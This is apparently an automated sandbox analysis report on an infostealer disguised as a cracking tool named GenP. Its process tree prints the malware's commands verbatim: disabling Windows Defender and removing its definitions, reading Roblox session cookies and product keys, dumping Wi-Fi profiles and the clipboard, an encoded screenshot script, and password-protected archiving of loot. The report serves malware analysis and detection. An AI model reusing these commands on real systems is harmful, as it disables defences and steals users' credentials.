Analysis

  • max time kernel
    31s
  • max time network
    33s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-11-2024 14:54

General

  • Target

    GenP-3.4.14.1.exe

  • Size

    8.1MB

  • MD5

    18286deb642a79bd9af012a30dc872c7

  • SHA1

    8cd8afa5d4da303d1b1be482dc077e0f9cbc7a45

  • SHA256

    a5ce5fc1a69793f317e433cdc75ddc86ff19597e0355be3e82114fceabfec2e6

  • SHA512

    4240a7bc05d96de14169808313b44a43b3965cf9a408d1c391a045f8537ecd0aeb1a56ccbd02799a31c52539f10e8414f0af3e69695e8d7913b3e3a378987d7e

  • SSDEEP

    196608:BB0cD9a1Ljv+bhqNVoBKUh8mz4Iv9PQv1DVa:8i9CL+9qz8/b4Imv3a

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 59 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\GenP-3.4.14.1.exe
    "C:\Users\Admin\AppData\Local\Temp\GenP-3.4.14.1.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3276
    • C:\Users\Admin\AppData\Local\Temp\GenP-3.4.14.1.exe
      "C:\Users\Admin\AppData\Local\Temp\GenP-3.4.14.1.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2920
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\GenP-3.4.14.1.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4932
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\GenP-3.4.14.1.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2280
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:216
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3752
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3640
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5076
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4544
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          PID:4736
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3096
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1864
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2052
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1588
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2692
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2612
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1608
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1256
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:752
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4240
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3616
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:5048
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4048
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:2872
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:3620
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:4968
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4672
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:2096
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3292
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5112
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lpzqcigg\lpzqcigg.cmdline"
              5⤵
                PID:4580
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDAEF.tmp" "c:\Users\Admin\AppData\Local\Temp\lpzqcigg\CSCD4519B1ACBC34576AA11AB887A1542DB.TMP"
                  6⤵
                    PID:1996
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4568
              • C:\Windows\system32\tree.com
                tree /A /F
                4⤵
                  PID:3452
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                  PID:4992
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:1152
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:2268
                      • C:\Windows\System32\Conhost.exe
                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        4⤵
                          PID:4048
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:1812
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                          3⤵
                            PID:4432
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              4⤵
                                PID:4796
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              3⤵
                                PID:3164
                                • C:\Windows\system32\tree.com
                                  tree /A /F
                                  4⤵
                                    PID:2776
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                  3⤵
                                    PID:3948
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                      4⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4876
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                    3⤵
                                      PID:2344
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                        4⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5104
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "getmac"
                                      3⤵
                                        PID:3708
                                        • C:\Windows\system32\getmac.exe
                                          getmac
                                          4⤵
                                            PID:760
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI32762\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\wMnFD.zip" *"
                                          3⤵
                                            PID:1812
                                            • C:\Windows\System32\Conhost.exe
                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              4⤵
                                                PID:2268
                                              • C:\Users\Admin\AppData\Local\Temp\_MEI32762\rar.exe
                                                C:\Users\Admin\AppData\Local\Temp\_MEI32762\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\wMnFD.zip" *
                                                4⤵
                                                • Executes dropped EXE
                                                PID:4796
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                              3⤵
                                                PID:1936
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic os get Caption
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4568
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                3⤵
                                                  PID:4084
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic computersystem get totalphysicalmemory
                                                    4⤵
                                                      PID:2484
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                    3⤵
                                                      PID:1880
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic csproduct get uuid
                                                        4⤵
                                                          PID:960
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                        3⤵
                                                          PID:4388
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                            4⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:224
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                          3⤵
                                                            PID:2152
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic path win32_VideoController get name
                                                              4⤵
                                                              • Detects videocard installed
                                                              PID:2056
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                            3⤵
                                                              PID:1016
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                4⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:3752

                                                        Network

                                                        MITRE ATT&CK Enterprise v15

                                                        Replay Monitor

                                                        Loading Replay Monitor...

                                                        Downloads

                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                          Filesize

                                                          2KB

                                                          MD5

                                                          d85ba6ff808d9e5444a4b369f5bc2730

                                                          SHA1

                                                          31aa9d96590fff6981b315e0b391b575e4c0804a

                                                          SHA256

                                                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                          SHA512

                                                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

